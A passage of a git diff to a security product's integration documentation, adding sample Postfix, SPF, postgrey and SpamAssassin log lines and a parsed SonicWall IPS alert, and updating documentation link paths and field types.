identity=mailfrom; client-ip=1.2.3.4; helo=example.outbound.protection.outlook.com; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf16" + + ``` + Permerror; identity=helo; client-ip=1.2.3.4; helo=example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf17" + + ``` + Permerror; identity=mailfrom; client-ip=1.2.3.4; helo=example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf18" + + ``` + Permerror; identity=mailfrom; client-ip=1.2.3.4; helo=example.org; envelope-from=no-reply@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf19" + + ``` + Softfail; identity=mailfrom; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=noreply@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf2" + + ``` + Action: prepend: Text: Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=mx.example.com; envelope-from=prvs=30447fe13=no-reply@example.com; receiver= Reject action: 550 5.7.23 + ``` + + + +=== "wo_appname_policydspf20" + + ``` + prepend Received-SPF: Fail (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf21" + + ``` + prepend Received-SPF: Neutral (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf22" + + ``` + prepend Received-SPF: None (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf23" + + ``` + prepend Received-SPF: None (no SPF record) identity=helo; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf24" + + ``` + prepend Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf25" + + ``` + prepend Received-SPF: Pass (sender SPF authorized) identity=helo; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf26" + + ``` + prepend Received-SPF: Permerror (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf27" + + ``` + prepend Received-SPF: Softfail (domain owner discourages use of this host) identity=helo; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf28" + + ``` + prepend Received-SPF: Softfail (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf3" + + ``` + Action: prepend Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=11.22.33.44; helo=mta-11-22-33-44.example.or; envelope-from=doe@newsletter.example.org; receiver= + ``` + + + +=== "wo_appname_policydspf4" + + ``` + Pass; identity=mailfrom; client-ip=1.1.1.1; helo=mail.corp.com; envelope-from=username@corp.com; receiver= 131 + ``` + + + +=== "wo_appname_policydspf5" + + ``` + None; identity=helo; client-ip=1.1.1.1; helo=sub.corp.com; envelope-from=noreply@corp.com; receiver= 128 + ``` + + + +=== "wo_appname_policydspf6" + + ``` + Softfail; identity=mailfrom; client-ip=1.1.1.1; helo=corp.com; envelope-from=username@corp.com; receiver= 120 + ``` + + + +=== "wo_appname_policydspf7" + + ``` + Action: prepend: Text: Received-SPF: None (mailfrom) identity=mailfrom; client-ip=2.3.4.5; helo=[1.2.3.4]; envelope-from=jdoe@example.org; receiver= Reject action: 550 5.7.23 + ``` + + + +=== "wo_appname_policydspf8" + + ``` + Action: prepend: Text: Received-SPF: None (no SPF record) identity=helo; client-ip=2.3.4.5; helo=posta.example.org; envelope-from=<>; receiver= Reject action: 550 5.7.23 + ``` + + + +=== "wo_appname_policydspf9" + + ``` + Action: prepend: Text: Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=example.outbound.protection.outlook.com; envelope-from=jdoe@example.org; receiver= Reject action: 550 5.7.23 + ``` + + + +=== "wo_appname_postfix1" + + ``` + 7B082110A6E0: host smtp.office365.com[40.101.136.242] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=EXAMPLE.PROD.OUTLOOK.COM] (in reply to end of DATA command) + ``` + + + +=== "wo_appname_postfix2" + + ``` + 01B3A96050: Used TLS for 10.19.65.1[10.19.65.1]:587 + ``` + + + +=== "wo_appname_postfix3" + + ``` + 023069605C: Used TLS for smtp.example.org[163.172.55.8]:25 + ``` + + + +=== "wo_appname_postfix4" + + ``` + NOQUEUE: client=unknown[10.100.0.3] + ``` + + + +=== "wo_appname_postfix5" + + ``` + warning: read TCP map reply from 127.0.0.1:10030: unexpected EOF (Operation now in progress) + ``` + + + +=== "wo_appname_postfix6" + + ``` + 0A90996059: to=, relay=localhost[127.0.0.1]:10025, conn_use=3, delay=5.2, delays=0/0/0/5.2, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 0BF0C9605C) + ``` + + + +=== "wo_appname_postfix7" + + ``` + proxy-accept: END-OF-MESSAGE: 250 2.0.0 Ok: queued as 7949396087; from= to= proto=ESMTP helo= + ``` + + + +=== "wo_appname_postfix8" + + ``` + D2D459605C: Used TLS for smtp-in.example.com[5.6.7.8]:25 + ``` + + + +=== "wo_appname_postfix_cleanup1" + + ``` + 581B85F5B3: warning: header Content-Disposition: inline; filename=""image018.png""; size=162328;??creation-date=""Thu, 11 Apr 2024 07:53:08 GMT"";??modification-date=""Thu, 11 Apr 2024 07:53:08 GMT"" from local; from= to= + ``` + + + +=== "wo_appname_postfix_cleanup2" + + ``` + 59B835F5AD: warning: header Content-Disposition: attachment;??filename=""=?utf-8?B?111111111111111111111111111111111111111111111111111111111111?=? =?utf-8?B?222222222222222222222222222222222222222222222222222222222222?=? =?utf-8? from local; from= to= + ``` + + + +=== "wo_appname_postfix_cleanup3" + + ``` + EBA403F815: message-id=<74c99d8a-eb8b-4045-ae8e-6d3f6d51b41d@example.org> + ``` + + + +=== "wo_appname_postfix_no_spam_cleanup1" + + ``` + 000FA5FD8F: prepend: header From: John Doe from localhost[127.0.0.1]; from= to= proto=ESMTP helo=: X-NMFP-TRUST: TRUE + ``` + + + +=== "wo_appname_postfix_no_spam_cleanup2" + + ``` + 008BB5FD76: prepend: header From: =?UTF-8?q?Cellier_du_P=C3=A9rigord?=?? from localhost[127.0.0.1]; from= to= proto=ESMTP helo=: X-NMFP-TRUST: FALSE + ``` + + + +=== "wo_appname_postgrey1" + + ``` + action=greylist, reason=early-retry (10s missing), client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com + ``` + + + +=== "wo_appname_postgrey2" + + ``` + action=greylist, reason=new, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com + ``` + + + +=== "wo_appname_postgrey3" + + ``` + action=greylist, reason=new, client_name=unknown, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com + ``` + + + +=== "wo_appname_postgrey4" + + ``` + action=pass, reason=client AWL, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com + ``` + + + +=== "wo_appname_postgrey5" + + ``` + action=pass, reason=client whitelist, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com + ``` + + + +=== "wo_appname_postgrey6" + + ``` + action=pass, reason=triplet found, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com + ``` + + + +=== "wo_appname_postgrey7" + + ``` + whitelisted: mx.example.org[1.2.3.4/32] + ``` + + + +=== "wo_appname_postgrey8" + + ``` + whitelisted: unknown[1.2.3.4/32] + ``` + + + +=== "wo_appname_qmgr" + + ``` + 89BE920002: from=, size=152518, nrcpt=1 (queue active) + ``` + + + +=== "wo_appname_qmgr2" + + ``` + 074955F67C: from=, size=4303, nrcpt=1 (queue active) + ``` + + + +=== "wo_appname_queued" + + ``` + CA9311112C08: to=, relay=srv.corp.com[1.1.1.1]:25, delay=8.4, delays=7.6/0/0.31/0.47, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 4TwNdH5zwCz7fxV) 257 + ``` + + + +=== "wo_appname_relay" + + ``` + 56E28C0007: to=, relay=1.1.1.1[1.1.1.1]:10025, delay=0.63, delays=0.57/0/0.05/0.01, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as DF82A21108) + ``` + + + +=== "wo_appname_replace_header" + + ``` + 95BCC140E40: replace: header From: EXAMPLE <[hola@example.org](mailto:hola@example.org)>: From: [noreply@example.org](mailto:noreply@example.org) + ``` + + + +=== "wo_appname_replace_header_1" + + ``` + 95BCC140E40: replace: header From: Example Mailbox <[test@example.org](mailto:test@example.org)>: From: [noreply@example.org](mailto:noreply@example.org) + ``` + + + +=== "wo_appname_replace_header_2" + + ``` + 2F46A140256: replace: header From: "Example Help" , orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox) + ``` + + + +=== "wo_appname_smtp2" + + ``` + 1176E3F820: to=, orig_to=, relay=spamfilter, delay=3.3, delays=0.78/0/0/2.5, dsn=2.0.0, status=sent (delivered via spamfilter service) + ``` + + + +=== "wo_appname_smtp3" + + ``` + 7B3643F820: to=, relay=127.0.0.1[127.0.0.1]:10025, delay=0.08, delays=0.03/0/0.01/0.05, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 837B35FD17) + ``` + + + +=== "wo_appname_smtp4" + + ``` + 05BC43F81E: host mx.example.org[5.6.7.8] said: 421 4.3.0 Upstream error, please check https://example.com/email-routing/postmaster for possible reasons why. yrtPbwx4hZz2 (in reply to end of DATA command) + ``` + + + +=== "wo_appname_smtp5" + + ``` + 30D713F81F: host mx.example.org[5.6.7.8] said: 450 4.1.1 : Recipient address rejected: unverified address: Mailbox might be disabled, full, or may not exist on the server. Reason: JFE030050 (in reply to RCPT TO command) + ``` + + + +=== "wo_appname_smtp6" + + ``` + connect to mx.example.org[5.6.7.8]:25: No route to host + ``` + + + +=== "wo_appname_smtp_connection3_timed_out" + + ``` + connect to mail.corp.com[1.1.1.1]:25: Connection timed out 125 + ``` + + + +=== "wo_appname_smtp_relay" + + ``` + 96887C0006: to=, relay=exemple.com[1.1.1.1]:25, delay=354776, delays=354775/0/0.9/0.16, dsn=4.3.1, status=deferred (host exemple.com[1.1.1.1] said: 452 4.3.1 Insufficient system storage (in reply to MAIL FROM command)) + ``` + + + +=== "wo_appname_smtpd1" + + ``` + 021C03F820: filter: RCPT from mx.example.org[192.168.100.124]: : Client host triggers FILTER smtp:[127.0.0.1]:10025; from= to= proto=ESMTP helo= + ``` + + + +=== "wo_appname_smtpd2" + + ``` + lost connection after BDAT from mx.example.org[192.168.100.124] + ``` + + + +=== "wo_appname_smtpd3" + + ``` + warning: hostname mx.example.org does not resolve to address 5.6.7.8: Name or service not known + ``` + + + +=== "wo_appname_smtpd4" + + ``` + warning: mx.example.org[192.168.100.132]: SASL LOGIN authentication failed: authentication failure, sasl_username=john.doe@exmaple.org + ``` + + + +=== "wo_appname_smtpd_connection" + + ``` + lost connection after AUTH from unknown[1.1.1.1] + ``` + + + +=== "wo_appname_smtpd_connection2" + + ``` + connect from unknown[10.1.1.1] 88 + ``` + + + +=== "wo_appname_smtpd_tls" + + ``` + Trusted TLS connection established from mail.outbound.protection.outlook.com[1.1.1.1]: TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits) + ``` + + + +=== "wo_appname_smtpd_tls2" + + ``` + Trusted TLS connection established to mx.corp.com[1.1.1.1]:25: TLSv1.3 with cipher TLS_AES_128_GCM_SHA256 (128/128 bits) key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256 + ``` + + + +=== "wo_appname_smtpd_tls3" + + ``` + Trusted TLS connection established to 127.0.0.1[127.0.0.1]:10025: TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256 201 + ``` + + + +=== "wo_appname_spamd1" + + ``` + spamd: result: . -1 - DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,HEADER_FROM_DIFFERENT_DOMAINS,HTML_MESSAGE,SPF_HELO_NONE,SPF_PASS,T_KAM_HTML_FONT_INVALID scantime=3.4,size=120289,user=debian-spamd,uid=119,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=44944,mid=<11111111111111@uexample.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd10" + + ``` + spamd: result: . -1 - DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,FORGED_HOTMAIL_RCVD2,FREEMAIL_FROM,HTML_IMAGE_RATIO_04,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_PASS scantime=2.7,size=102578,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=45880,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd11" + + ``` + spamd: result: . -1 - DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,FREEMAIL_ENVFROM_END_DIGIT,FREEMAIL_FROM,FREEMAIL_REPLYTO_END_DIGIT,HTML_MESSAGE,MIME_HTML_ONLY,RCVD_IN_DNSWL_NONE,SPF_HELO_PASS,SPF_PASS,T_FREEMAIL_DOC_PDF scantime=4.7,size=2252595,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=49594,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd12" + + ``` + spamd: result: . -1 - DMARC_PASS,MIME_HEADER_CTYPE_ONLY,MISSING_DATE,MISSING_MID,SPF_HELO_NONE,SPF_PASS scantime=3.3,size=4260,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=46436,mid=(unknown),autolearn=disabled + ``` + + + +=== "wo_appname_spamd13" + + ``` + spamd: result: . -1 - FREEMAIL_ENVFROM_END_DIGIT,FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_PASS scantime=2.6,size=8094,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=39504,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd14" + + ``` + spamd: result: . -1 - FREEMAIL_FORGED_FROMDOMAIN,FREEMAIL_FROM,HEADER_FROM_DIFFERENT_DOMAINS,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_NONE,SPF_PASS scantime=2.8,size=61589,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=37172,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd15" + + ``` + spamd: result: . -1 - HTML_FONT_LOW_CONTRAST,HTML_IMAGE_RATIO_08,HTML_MESSAGE,LOTS_OF_MONEY,MIME_HTML_MOSTLY,MPART_ALT_DIFF,RCVD_IN_MSPIKE_H4,RCVD_IN_MSPIKE_WL,SPF_HELO_NONE,SPF_PASS scantime=3.3,size=164381,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=56082,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd16" + + ``` + spamd: result: . -1 - HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,HTML_OBFUSCATE_05_10,MIME_HTML_ONLY,SPF_HELO_PASS,SPF_PASS scantime=2.5,size=1572,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=51336,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd17" + + ``` + spamd: result: . -6 - DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,HTML_MESSAGE,RCVD_IN_DNSWL_MED,SPF_HELO_PASS,SPF_PASS scantime=2.6,size=7882,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=33278,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd18" + + ``` + spamd: connection from test.com [127.0.0.1]:33620 to port 783, fd 5 + ``` + + + +=== "wo_appname_spamd19" + + ``` + spamd: connection from mx.example.org [127.0.0.1]:33620 to port 783, fd 5 + ``` + + + +=== "wo_appname_spamd2" + + ``` + spamd: connection from example.org [127.0.0.1]:53684 to port 783, fd 5 + ``` + + + +=== "wo_appname_spamd20" + + ``` + spamd: processing message for debian-spamd:118 + ``` + + + +=== "wo_appname_spamd21" + + ``` + spamd: processing message for debian-spamd:117 + ``` + + + +=== "wo_appname_spamd22" + + ``` + spamd: processing message <0113018ecc14540b-4a312890-d3e4-4332-887c-1d5be7521aa1-000000@eu-west-3.amazonses.com> for debian-spamd:118 + ``` + + + +=== "wo_appname_spamd23" + + ``` + spamd: processing message <55555555555555555555555555555555555-8nmAAKsF_9_U+fg@mail.gmail.com> for debian-spamd:118 + ``` + + + +=== "wo_appname_spamd24" + + ``` + spamd: processing message <66666666666666666666666666666666666666@EXAMPLE.PROD.OUTLOOK.COM> for debian-spamd:117 + ``` + + + +=== "wo_appname_spamd3" + + ``` + spamd: result: . -1 - AC_DIV_BONANZA,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H3,RCVD_IN_MSPIKE_WL,SPF_HELO_NONE,SPF_PASS,URI_NOVOWEL scantime=3.2,size=209868,user=debian-spamd,uid=117,required_score=5.0,rhost=test.host.test,raddr=127.0.0.1,rport=44702,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd4" + + ``` + spamd: result: . -1 - ANY_BOUNCE_MESSAGE,DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,FORGED_SPF_HELO,HTML_MESSAGE,OOOBOUNCE_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_NONE scantime=2.7,size=14228,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=36236,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd5" + + ``` + spamd: result: . -1 - APOSTROPHE_FROM,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,HTML_FONT_LOW_CONTRAST,HTML_MESSAGE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_PASS scantime=4.9,size=575869,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=41352,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd6" + + ``` + spamd: result: . -1 - DEAR_SOMETHING,DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,HTML_MESSAGE,PDS_BTC_ID,RCVD_IN_DNSWL_LOW,SPF_HELO_NONE,SPF_NONE scantime=5.3,size=468649,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=42678,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd7" + + ``` + spamd: result: . -1 - DEAR_SOMETHING,DMARC_PASS,HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,RCVD_IN_DNSWL_LOW,SPF_HELO_NONE,SPF_PASS scantime=2.8,size=3254,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=45060,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd8" + + ``` + spamd: result: . -1 - DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,FORGED_SPF_HELO,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_NONE scantime=2.3,size=10467,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=45920,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd9" + + ``` + spamd: result: . -1 - DKIM_INVALID,DKIM_SIGNED,HEADER_FROM_DIFFERENT_DOMAINS,HTML_FONT_LOW_CONTRAST,HTML_MESSAGE,MIME_HTML_ONLY,RCVD_IN_MSPIKE_H2,SPF_HELO_NONE,SPF_PASS,T_REMOTE_IMAGE scantime=2.9,size=65264,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=33254,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887.md b/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887.md index 7b4038bdfa..e8d5842094 100644 --- a/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887.md +++ b/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887.md @@ -30,7 +30,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_app_control_detection_alert.json" @@ -500,6 +500,48 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_ips_detection_alert.json" + + ```json + + { + "message": "0|SonicWall|TZ 370|7.1.1-7058-R6162|608|IPS Detection Alert|9|11111:22:33:44:55:666.7.8.9999999ABVOIPCD.7.8.111111111:22:33:44:55:6666.7.8.9999999A0-V10WAN92.168.0.1udp/50601010\"Default Access Rule_145\"35\"IPS Detection Alert: INFO SIP Session Progress, SID: 1188, Priority: Low\" msg=\"IPS Detection Alert: INFO SIP Session Progress\" sid=1188 ipscat=\"INFO SIP Session Progress\" ipspri=3 51117", + "event": { + "category": [ + "network" + ], + "code": "608", + "kind": "alert", + "reason": "IPS Detection Alert: INFO SIP Session Progress", + "severity": 9, + "type": [ + "protocol" + ] + }, + "cef": { + "event_type": "base event" + }, + "observer": { + "type": "firewall", + "vendor": "SonicWall", + "version": "7.1.1-7058-R6162" + }, + "sonicwall": { + "fw": { + "event": { + "name": "IPS Detection Alert" + }, + "ipscat": "INFO SIP Session Progress", + "ipspri": 351117, + "priority": "ALERT", + "sid": 1188 + } + } + } + + ``` + + === "test_syslog_website_accessed.json" ```json @@ -690,10 +732,9 @@ The following table lists the fields that are extracted, normalized under the EC |`sonicwall.fw.fw_action` | `keyword` | URL: Applicable only when Network Packet Capture System (NPCS Solera) is enabled, displays URL of an NPCS object | |`sonicwall.fw.gcat` | `number` | Group category: Display event group category number when using Enhanced Syslog | |`sonicwall.fw.gcatname` | `keyword` | Group category: Display event group category name when using Enhanced Syslog | -|`sonicwall.fw.ipscat` | `number` | Displays the IPS category | +|`sonicwall.fw.ipscat` | `keyword` | Displays the IPS category | |`sonicwall.fw.ipspri` | `number` | Displays the IPS priority | |`sonicwall.fw.priority` | `keyword` | Displays the event priority level | -|`sonicwall.fw.reason` | `number` | Blocking code: Indicates the CFS block code | |`sonicwall.fw.sid` | `number` | Provides either IPS or Anti-Spyware signature ID | |`source.bytes` | `long` | Bytes sent from the source to the destination. | |`source.domain` | `keyword` | The domain name of the source. | diff --git a/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887_sample.md b/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887_sample.md index ebd02d1da6..f778072fc7 100644 --- a/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887_sample.md +++ b/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887_sample.md @@ -44,6 +44,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_ips_detection_alert" + + ``` + 0|SonicWall|TZ 370|7.1.1-7058-R6162|608|IPS Detection Alert|9|11111:22:33:44:55:666.7.8.9999999ABVOIPCD.7.8.111111111:22:33:44:55:6666.7.8.9999999A0-V10WAN92.168.0.1udp/50601010"Default Access Rule_145"35"IPS Detection Alert: INFO SIP Session Progress, SID: 1188, Priority: Low" msg="IPS Detection Alert: INFO SIP Session Progress" sid=1188 ipscat="INFO SIP Session Progress" ipspri=3 51117 + ``` + + + === "test_syslog_website_accessed" ``` diff --git a/_shared_content/operations_center/integrations/generated/ee54dd8e-4bd4-4fe8-9d9d-1a018cd8c4bb.md b/_shared_content/operations_center/integrations/generated/ee54dd8e-4bd4-4fe8-9d9d-1a018cd8c4bb.md index a89d58521f..edff737c84 100644 --- a/_shared_content/operations_center/integrations/generated/ee54dd8e-4bd4-4fe8-9d9d-1a018cd8c4bb.md +++ b/_shared_content/operations_center/integrations/generated/ee54dd8e-4bd4-4fe8-9d9d-1a018cd8c4bb.md @@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "account_modification.json" diff --git a/_shared_content/operations_center/integrations/generated/ee6364a1-9e3c-4363-9cb6-2f574bd4ce51.md b/_shared_content/operations_center/integrations/generated/ee6364a1-9e3c-4363-9cb6-2f574bd4ce51.md index 5ee1c7c098..4a9135ef80 100644 --- a/_shared_content/operations_center/integrations/generated/ee6364a1-9e3c-4363-9cb6-2f574bd4ce51.md +++ b/_shared_content/operations_center/integrations/generated/ee6364a1-9e3c-4363-9cb6-2f574bd4ce51.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "CountsofSecurityEvents.json" diff --git a/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69.md b/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69.md index e65128fecd..3cb9e3f6c1 100644 --- a/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69.md +++ b/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69.md @@ -19,7 +19,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "CEF.json" @@ -664,6 +664,83 @@ This section 